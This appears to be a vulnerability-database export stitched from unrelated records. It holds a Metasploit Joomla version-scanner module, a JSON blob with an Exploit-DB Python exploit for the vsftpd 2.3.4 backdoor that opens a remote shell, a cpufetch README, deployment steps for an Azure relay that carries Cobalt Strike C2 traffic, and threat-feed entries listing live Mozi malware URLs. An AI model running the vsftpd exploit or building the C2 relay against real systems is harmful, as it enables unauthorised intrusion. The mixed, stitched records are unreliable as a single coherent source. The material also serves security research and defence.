ID MSF:AUXILIARY/SCANNER/HTTP/JOOMLA_VERSION Type metasploit Reporter Rapid7 Modified 2017-07-24T13:26:21
Description
This module scans a Joomla install for information about the underlying operating system and Joomla version.
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HTTP::Joomla
include Msf::Auxiliary::Scanner
include Msf::Auxiliary::Report
# Huge thanks to @zeroSteiner for helping me. Also thanks to @kaospunk. Finally thanks to
# Joomscan and various MSF modules for code examples.
def initialize
super(
'Name' => 'Joomla Version Scanner',
'Description' => %q{
This module scans a Joomla install for information about the underlying
operating system and Joomla version.
},
'Author' => [ 'newpid0' ],
'License' => MSF_LICENSE
)
end
def get_server_header
# This module used to determine the operating system by the server header. But this is
# not an accurate way to do OS detection, so we have toned it down to just returning the
# header, and let the user decide.
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path)
})
if res && res.headers['Server']
return res.headers['Server']
end
nil
end
def run_host(ip)
unless joomla_and_online?
print_error("It doesn't look like Joomla is up and running at #{target_uri.to_s}")
return
end
server = get_server_header
version = joomla_version
if server
print_status("Server: #{server}")
else
print_error("Unable to determine server.")
end
if version
print_good("Joomla version: #{version}")
report_note(
host: ip,
port: datastore['RPORT'],
proto: ssl ? 'https' : 'http',
ntype: 'joomla.version',
data: version
)
else
print_error("Unable to find Joomla version.")
end
end
end
{"id": "MSF:AUXILIARY/SCANNER/HTTP/JOOMLA_VERSION", "type": "metasploit", "bulletinFamily": "exploit", "title": "Joomla Version Scanner", "description": "This module scans a Joomla install for information about the underlying operating system and Joomla version.\n", "published": "2013-01-25T19:44:49", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2020-02-17T03:31:40", "viewCount": 371, "enchantments": {"score": {"value": 0.2, "vector": "NONE", "modified": "2020-02-17T03:31:40", "rev": 2}, "dependencies": {"references": [{"type": "symantec", "idList": ["SMNTC-111398"]}, {"type": "kitploit", "idList": ["KITPLOIT:5697636294568844262", "KITPLOIT:4382548335947477511", "KITPLOIT:4039790738926215375"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2020:1723-1", "OPENSUSE-SU-2020:1724-1", "OPENSUSE-SU-2020:1719-1"]}, {"type": "openbugbounty", "idList": ["OBB:1441302", "OBB:1441308", "OBB:1441299", "OBB:1441285", "OBB:1441310", "OBB:1441309", "OBB:1441294", "OBB:1441297", "OBB:1441298", "OBB:1441306"]}], "modified": "2020-02-17T03:31:40", "rev": 2}, "vulnersScore": 0.2}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/http/joomla_version.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HTTP::Joomla\n include Msf::Auxiliary::Scanner\n include Msf::Auxiliary::Report\n\n # Huge thanks to @zeroSteiner for helping me. Also thanks to @kaospunk. Finally thanks to\n # Joomscan and various MSF modules for code examples.\n def initialize\n super(\n 'Name' => 'Joomla Version Scanner',\n 'Description' => %q{\n This module scans a Joomla install for information about the underlying\n operating system and Joomla version.\n },\n 'Author' => [ 'newpid0' ],\n 'License' => MSF_LICENSE\n )\n end\n\n def get_server_header\n # This module used to determine the operating system by the server header. But this is\n # not an accurate way to do OS detection, so we have toned it down to just returning the\n # header, and let the user decide.\n res = send_request_cgi({\n 'uri' => normalize_uri(target_uri.path)\n })\n\n if res && res.headers['Server']\n return res.headers['Server']\n end\n\n nil\n end\n\n def run_host(ip)\n unless joomla_and_online?\n print_error(\"It doesn't look like Joomla is up and running at #{target_uri.to_s}\")\n return\n end\n\n server = get_server_header\n version = joomla_version\n\n if server\n print_status(\"Server: #{server}\")\n else\n print_error(\"Unable to determine server.\")\n end\n\n if version\n print_good(\"Joomla version: #{version}\")\n report_note(\n host: ip,\n port: datastore['RPORT'],\n proto: ssl ? 'https' : 'http',\n ntype: 'joomla.version',\n data: version\n )\n else\n print_error(\"Unable to find Joomla version.\")\n end\n end\nend\n", "metasploitReliability": "", "metasploitHistory": "", "immutableFields": []}
{"exploitdb": [{"lastseen": "2021-04-12T10:29:31", "description": "", "published": "2021-04-12T00:00:00", "type": "exploitdb", "title": "vsftpd 2.3.4 - Backdoor Command Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-2523"], "modified": "2021-04-12T00:00:00", "id": "EDB-ID:49757", "href": "https://www.exploit-db.com/exploits/49757", "sourceData": "# Exploit Title: vsftpd 2.3.4 - Backdoor Command Execution\r\n# Date: 9-04-2021\r\n# Exploit Author: HerculesRD\r\n# Software Link: http://www.linuxfromscratch.org/~thomasp/blfs-book-xsl/server/vsftpd.html\r\n# Version: vsftpd 2.3.4\r\n# Tested on: debian\r\n# CVE : CVE-2011-2523\r\n\r\n#!/usr/bin/python3 \r\n \r\nfrom telnetlib import Telnet \r\nimport argparse\r\nfrom signal import signal, SIGINT\r\nfrom sys import exit\r\n\r\ndef handler(signal_received, frame):\r\n # Handle any cleanup here\r\n print(' [+]Exiting...')\r\n exit(0)\r\n\r\nsignal(SIGINT, handler) \r\nparser=argparse.ArgumentParser() \r\nparser.add_argument(\"host\", help=\"input the address of the vulnerable host\", type=str)\r\nargs = parser.parse_args() \r\nhost = args.host \r\nportFTP = 21 #if necessary edit this line\r\n\r\nuser=\"USER nergal:)\"\r\npassword=\"PASS pass\"\r\n\r\ntn=Telnet(host, portFTP)\r\ntn.read_until(b\"(vsFTPd 2.3.4)\") #if necessary, edit this line\r\ntn.write(user.encode('ascii') + b\"\\n\")\r\ntn.read_until(b\"password.\") #if necessary, edit this line\r\ntn.write(password.encode('ascii') + b\"\\n\")\r\n\r\ntn2=Telnet(host, 6200)\r\nprint('Success, shell opened')\r\nprint('Send `exit` to quit shell')\r\ntn2.interact()", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://www.exploit-db.com/download/49757"}], "kitploit": [{"lastseen": "2021-04-12T00:31:24", "bulletinFamily": "tools", "cvelist": [], "description": "[  ](<https://1.bp.blogspot.com/-gW4iYIx5CtU/YGvhCi0WHtI/AAAAAAAAV0w/BVU7TtULfJ4WX32_09My7WRrmnWotrnfgCNcBGAsYHQ/s1119/cpufetch_7_i9.png>)\n\n \n\n\nSimplistic yet fancy CPU architecture fetching tool \n\n \n\n\n** 1\\. Support ** \n\n\ncpufetch currently supports x86_64 CPUs (both Intel and AMD) and ARM. \n\nPlatform | x86_64 | ARM | Notes \n---|---|---|--- \nLinux | \n\n\u2714\ufe0f \n\n| \n\n\u2714\ufe0f \n\n| Prefered platform. \nExperimental ARM support \nWindows | \n\n\u2714\ufe0f \n\n| \n\n\u274c \n\n| Some information may be missing. \nColors will be used if supported \nAndroid | \n\n\u2757 \n\n| \n\n\u2714\ufe0f \n\n| Experimental ARM support \nmacOS | \n\n\u2714\ufe0f \n\n| \n\n\u274c \n\n| Some information may be missing \nEmoji | Meaning \n---|--- \n \n\u2714\ufe0f \n\n| Supported \n \n\u274c \n\n| Not supported \n \n\u2757 \n\n| Not tested \n \n** 2\\. Installation ** \n \n** 2.1 Building from source ** \n\n\nJust clone the repo and use ` make ` to compile it \n \n \n git clone https://github.com/Dr-Noob/cpufetch \n cd cpufetch \n make \n ./cpufetch \n \n\nThe Makefile is designed to work on Linux, [ Windows ](<https://www.kitploit.com/search/label/Windows> \"Windows\" ) and macOS. \n\n \n** 2.2 Linux ** \n\n\nThere is a cpufetch package available in [ Arch Linux ](<https://www.kitploit.com/search/label/Arch%20Linux> \"Arch Linux\" ) ( [ cpufetch-git ](<https://aur.archlinux.org/packages/cpufetch-git> \"cpufetch-git\" ) ). If you are in another distribution, you can build ` cpufetch ` from source. \n\n \n** 2.2 Windows ** \n\n\nIn the [ releases ](<https://github.com/Dr-Noob/cpufetch/releases> \"releases\" ) section you will find some cpufetch executables compiled for Windows. Just download and run it from Windows CMD. You can also build ` cpufetch ` from source. \n\n \n** 2.3 macOS ** \n\n\nYou need to build ` cpufetch ` from source. \n\n \n** 2.4 Android ** \n\n\n 1. Install ` termux ` app (terminal emulator) \n 2. Run ` pkg install -y git make clang ` inside termux. \n 3. Build from source normally: \n * git clone [ https://github.com/Dr-Noob/cpufetch ](<https://github.com/Dr-Noob/cpufetch> \"https://github.com/Dr-Noob/cpufetch\" )\n * cd cpufetch \n * make \n * ./cpufetch \n \n** 3\\. Examples ** \n\n\nHere are more examples of how ` cpufetch ` looks on different CPUs. \n\n \n** 3.1 x86_64 CPUs ** \n\n\n \n\n\n[  ](<https://1.bp.blogspot.com/-fFmkaqMp5qM/YGvhKvuE5_I/AAAAAAAAV04/1cxvYR0awmEHVHpfc1ZRPb6878gF941zwCNcBGAsYHQ/s1033/cpufetch_8_epyc.png>)\n\n \n\n\n[  ](<https://1.bp.blogspot.com/-BoCNiF_Mqg8/YGvhKiEovqI/AAAAAAAAV00/RlkLaqx5wAoGfy2RTAfdhbg4EO_qiqL4wCNcBGAsYHQ/s1107/cpufetch_9_cascade_lake.png>)\n\n \n\n\n** 3.2 ARM CPUs ** \n\n\n[  ](<https://1.bp.blogspot.com/-liHK00gR8qM/YGvhQARp_UI/AAAAAAAAV1A/ouY0-MaMm7ICBCsrfvpCeS0F2BGlAcK1gCNcBGAsYHQ/s1173/cpufetch_11_snapdragon.png>)\n\n \n\n\n[  ](<https://1.bp.blogspot.com/-a3y22tYqlAk/YGvhQOcvTZI/AAAAAAAAV08/J5y8fKfYp9spQALMfEb0HKIwbtl2BpxQQCNcBGAsYHQ/s1173/cpufetch_10_exynos.png>)\n\n \n\n\n** 4\\. Colors and style ** \n\n\nBy default, ` cpufetch ` will print the CPU art with the system colorscheme. However, you can always set a custom color scheme, either specifying Intel or AMD, or specifying the colors in RGB format: \n \n \n ./cpufetch --color intel (default color for Intel) \n ./cpufetch --color amd (default color for AND) \n ./cpufetch --color 239,90,45:210,200,200:100,200,45:0,200,200 (example) \n \n\nIn the case of setting the colors using RGB, 4 colors must be given in with the format: ` [R,G,B:R,G,B:R,G,B:R,G,B] ` . These colors correspond to CPU art color (2 colors) and for the text colors (following 2). Thus, you can customize all the colors. \n\n \n** 5\\. Implementation ** \n\n\nSee [ cpufetch programming documentation ](<https://github.com/Dr-Noob/cpufetch/blob/master/doc/README.md> \"cpufetch programming documentation\" ) . \n\n \n** 6\\. Bugs or improvements ** \n\n\nThere are many open issues in github (see [ issues ](<https://github.com/Dr-Noob/cpufetch/issues> \"issues\" ) ). Feel free to open a new one report an issue or propose any improvement in ` cpufetch `\n\nI would like to thank [ Gonzalocl ](<https://github.com/Gonzalocl> \"Gonzalocl\" ) and [ OdnetninI ](<https://github.com/OdnetninI> \"OdnetninI\" ) for their help, running ` cpufetch ` in many different CPUs they have [ access ](<https://www.kitploit.com/search/label/Access> \"access\" ) to, which makes it easier to debug and check the correctness of ` cpufetch ` . \n\n \n \n\n\n** [ Download Cpufetch ](<https://github.com/Dr-Noob/cpufetch> \"Download Cpufetch\" ) **\n", "edition": 1, "modified": "2021-04-11T21:30:00", "published": "2021-04-11T21:30:00", "id": "KITPLOIT:9097120095283720847", "href": "http://www.kitploit.com/2021/04/cpufetch-simplistic-yet-fancy-cpu.html", "title": "Cpufetch - Simplistic Yet Fancy CPU Architecture Fetching Tool", "type": "kitploit", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-04-11T16:38:55", "bulletinFamily": "tools", "cvelist": [], "description": "[  ](<https://1.bp.blogspot.com/-oa6G92plSqA/YGvgYtysKHI/AAAAAAAAV0o/t4My_zkK6c8t1pBye3UvChXovumbmPIBgCNcBGAsYHQ/s2048/AzureC2Relay_1_AzureRelay.png>)\n\n \n\n\nAzureC2Relay is an Azure Function that validates and relays [ Cobalt Strike ](<https://www.kitploit.com/search/label/Cobalt%20Strike> \"Cobalt Strike\" ) [ beacon ](<https://www.kitploit.com/search/label/Beacon> \"beacon\" ) [ traffic ](<https://www.kitploit.com/search/label/Traffic> \"traffic\" ) by verifying the incoming requests based on a Cobalt Strike Malleable C2 profile. Any incoming requests that do not share the profiles user-agent, URI paths, headers, and query parameters, will be redirected to a configurable decoy website. The validated C2 traffic is relayed to a team server within the same virtual network that is further restricted by a network security group. Allowing the VM to only expose SSH. \n\n \n\n\n** Deploy ** \n\n\nAzureC2Relay is deployed via [ terraform ](<https://www.kitploit.com/search/label/Terraform> \"terraform\" ) azure modules as well as some local az cli commands \n\nMake sure you have terraform , az cli and the dotnet core 3.1 runtime installed \n\nWindows (Powershell) \n \n \n &([scriptblock]::Create((Invoke-WebRequest -UseBasicParsing 'https://dot.net/v1/dotnet-install.ps1'))) -runtime dotnet -version 3.1.0 \n Invoke-WebRequest 'https://releases.hashicorp.com/terraform/0.14.6/terraform_0.14.6_windows_amd64.zip' -OutFile 'terraform.zip' \n Expand-Archive -Path terraform.zip -DestinationPath \"$([Environment]::GetFolderPath('ApplicationData'))\\TerraForm\\\" \n setx PATH \"%PATH%;$([Environment]::GetFolderPath('ApplicationData'))\\TerraForm\\\" \n Invoke-WebRequest -Uri https://aka.ms/installazurecliwindows -OutFile .\\AzureCLI.msi; Start-Process msiexec.exe -Wait -ArgumentList '/I AzureCLI.msi /quiet'; rm .\\AzureCLI.msi \n \n\nMac \n \n \n curl -L https://dot.net/v1/dotnet-install.sh | bash -s -- --runtime dotnet --version 3.1.0 \n brew update \n brew tap hashicorp/tap \n brew install hashicorp/tap/terraform \n brew install azure-cli \n \n\nUbuntu , Debian \n \n \n curl -L https://dot.net/v1/dotnet-install.sh | bash -s -- --runtime dotnet --version 3.1.0 \n wget https://releases.hashicorp.com/terraform/0.14.5/terraform_0.14.5_linux_amd64.zip \n unzip terraform_0.14.5_linux_amd64.zip \n sudo cp terraform /usr/local/bin/terraform \n curl -sL https://aka.ms/InstallAzureCLIDeb | sudo bash \n \n\nKali \n \n \n curl -L https://dot.net/v1/dotnet-install.sh | bash -s -- --runtime dotnet --version 3.1.0 \n wget https://releases.hashicorp.com/terraform/0.14.5/terraform_0.14.5_linux_amd64.zip \n unzip terraform_0.14.5_linux_amd64.zip \n sudo cp terraform /usr/local/bin/terraform \n echo \"deb [arch=amd64] https://packages.microsoft.com/repos/azure-cli/ stretch main\" | sudo tee /etc/apt/sources.list.d/azure-cli.list \n curl -L https://packages.microsoft.com/keys/microsoft.asc | sudo apt-key add - \n sudo apt-get update && sudo apt-get install apt-transport-https azure-cli \n \n\n 1. Modify the first variables defined in ` config.tf ` to suit your needs \n 2. Replace the dummy \"cobaltstrike-dist.tgz\" with an actual cobaltstrike download \n 3. Edit/Replace the Malleable profile inside the Ressources folder (Make sure the profile filename matches the variables you set in step 1) \n 4. login with azure ` az login `\n 5. run ` terraform init `\n 6. run ` terraform apply -auto-approve ` to deploy the infra \n 7. Wait for the CDN to become active and enjoy! \n\nOnce terraform completes it will provide you with the needed ssh command, the [ CobaltStrike ](<https://www.kitploit.com/search/label/CobaltStrike> \"CobaltStrike\" ) teamserver will be running inside an tmux session on the deployed VM \n\nWhen your done using the infra, you can remove it with ` terraform destroy -auto-approve `\n\n \n \n\n\n** [ Download AzureC2Relay ](<https://github.com/Flangvik/AzureC2Relay> \"Download AzureC2Relay\" ) **\n", "edition": 1, "modified": "2021-04-11T12:30:00", "published": "2021-04-11T12:30:00", "id": "KITPLOIT:4380638570301219950", "href": "http://www.kitploit.com/2021/04/azurec2relay-azure-function-that.html", "title": "AzureC2Relay - An Azure Function That Validates And Relays Cobalt Strike Beacon Traffic By Verifying The Incoming Requests Based On A Cobalt Strike Malleable C2 Profile", "type": "kitploit", "cvss": {"score": 0.0, "vector": "NONE"}}], "rst": [{"lastseen": "2021-04-10T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **http://59[.]151.202.3:3100/mozi.a** in [RST Threat Feed](https://rstcloud.net/profeed) with score **19**.\n First seen: 2021-01-05T03:00:00, Last seen: 2021-04-10T03:00:00.\n IOC tags: **malware**.\nIt was found that the IOC is used by: **mozi**.\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2021-01-05T00:00:00", "id": "RST:635919F8-C013-3142-814A-75918C7EFA04", "href": "", "published": "2021-04-11T00:00:00", "title": "RST Threat feed. IOC: http://59.151.202.3:3100/mozi.a", "type": "rst", "cvss": {}}, {"lastseen": "2021-04-10T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **http://59[.]151.202.3:3100/mozi.m** in [RST Threat Feed](https://rstcloud.net/profeed) with score **19**.\n First seen: 2021-01-05T03:00:00, Last seen: 2021-04-10T03:00:00.\n IOC tags: **malware**.\nIt was found that the IOC is used by: **mozi**.\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2021-01-05T00:00:00", "id": "RST:B93CAF71-1AA0-322E-9FC9-A6DDA6F3A384", "href": "", "published": "2021-04-11T00:00:00", "title": "RST Threat feed. IOC: http://59.151.202.3:3100/mozi.m", "type": "rst", "cvss": {}}, {"lastseen": "2021-04-10T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **http://59[.]151.214.4:4132/mozi.m** in [RST Threat Feed](https://rstcloud.net/profeed) with score **32**.\n First seen: 2021-02-21T03:00:00, Last seen: 2021-04-10T03:00:00.\n IOC tags: **malware**.\nIt was found that the IOC is used by: **mozi**.\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2021-02-21T00:00:00", "id": "RST:E0632DAD-E47F-392B-9A6D-F8E45E2FCA05", "href": "", "published": "2021-04-11T00:00:00", "title": "RST Threat feed. IOC: http://59.151.214.4:4132/mozi.m", "type": "rst", "cvss": {}}, {"lastseen": "2021-04-10T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **http://59[.]151.237.51:4994/i** in [RST Threat Feed](https://rstcloud.net/profeed) with score **37**.\n First seen: 2021-03-04T03:00:00, Last seen: 2021-04-10T03:00:00.\n IOC tags: **malware**.\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2021-03-04T00:00:00", "id": "RST:957F9E3A-6D81-3AEB-BBBA-2855899FBA86", "href": "", "published": "2021-04-11T00:00:00", "title": "RST Threat feed. IOC: http://59.151.237.51:4994/i", "type": "rst", "cvss": {}}, {"lastseen": "2021-04-10T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **http://59[.]151.246.125:4245/i** in [RST Threat Feed](https://rstcloud.net/profeed) with score **8**.\n First seen: 2021-02-07T03:00:00, Last seen: 2021-04-10T03:00:00.\n IOC tags: **malware**.\nIOC could be a **False Positive** (Resource unavailable).\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2021-02-07T00:00:00", "id": "RST:BA6E101E-D0DB-36A7-9249-B1306D3A07ED", "href": "", "published": "2021-04-11T00:00:00", "title": "RST Threat feed. IOC: http://59.151.246.125:4245/i", "type": "rst", "cvss": {}}, {"lastseen": "2021-04-10T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **http://59[.]151.246.125:4245/mozi.m** in [RST Threat Feed](https://rstcloud.net/profeed) with score **19**.\n First seen: 2021-01-05T03:00:00, Last seen: 2021-04-10T03:00:00.\n IOC tags: **malware**.\nIt was found that the IOC is used by: **mozi**.\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2021-01-05T00:00:00", "id": "RST:3C0D4E23-1F3B-3B20-B661-BB95B79AF2CC", "href": "", "published": "2021-04-11T00:00:00", "title": "RST Threat feed. IOC: http://59.151.246.125:4245/mozi.m", "type": "rst", "cvss": {}}, {"lastseen": "2021-04-10T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **http://59[.]173.135.51:60757/bin.sh** in [RST Threat Feed](https://rstcloud.net/profeed) with score **63**.\n First seen: 2021-04-08T03:00:00, Last seen: 2021-04-10T03:00:00.\n IOC tags: **malware**.\nIt was found that the IOC is used by: **mozi**.\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2021-04-08T00:00:00", "id": "RST:7EE41666-82CA-3E0D-B7EA-B208CDF11E14", "href": "", "published": "2021-04-11T00:00:00", "title": "RST Threat feed. IOC: http://59.173.135.51:60757/bin.sh", "type": "rst", "cvss": {}}, {"lastseen": "2021-04-10T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **http://59[.]173.135.51:60757/i** in [RST Threat Feed](https://rstcloud.net/profeed) with score **63**.\n First seen: 2021-04-08T03:00:00, Last seen: 2021-04-10T03:00:00.\n IOC tags: **malware**.\nIt was found that the IOC is used by: **mozi**.\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2021-04-08T00:00:00", "id": "RST:3C4B0C6C-F87D-3AEE-87D5-23490484C4D9", "href": "", "published": "2021-04-11T00:00:00", "title": "RST Threat feed. IOC: http://59.173.135.51:60757/i", "type": "rst", "cvss": {}}, {"lastseen": "2021-04-10T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **http://59[.]173.193.208:57080/mozi.m** in [RST Threat Feed](https://rstcloud.net/profeed) with score **59**.\n First seen: 2021-04-04T03:00:00, Last seen: 2021-04-10T03:00:00.\n IOC tags: **malware**.\nIt was found that the IOC is used by: **mozi**.\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2021-04-04T00:00:00", "id": "RST:CC508DBE-0465-303F-BE27-8A2C1C1B6AFF", "href": "", "published": "2021-04-11T00:00:00", "title": "RST Threat feed. IOC: http://59.173.193.208:57080/mozi.m", "type": "rst", "cvss": {}}, {"lastseen": "2021-04-11T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **http://59[.]175.63.177:40561/mozi.m** in [RST Threat Feed](https://rstcloud.net/profeed) with score **66**.\n First seen: 2021-04-11T03:00:00, Last seen: 2021-04-11T03:00:00.\n IOC tags: **malware**.\nIt was found that the IOC is used by: **mozi**.\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2021-04-11T00:00:00", "id": "RST:F303570E-D6B4-3F00-94FB-BA7B37A92678", "href": "", "published": "2021-04-11T00:00:00", "title": "RST Threat feed. IOC: http://59.175.63.177:40561/mozi.m", "type": "rst", "cvss": {}}]}
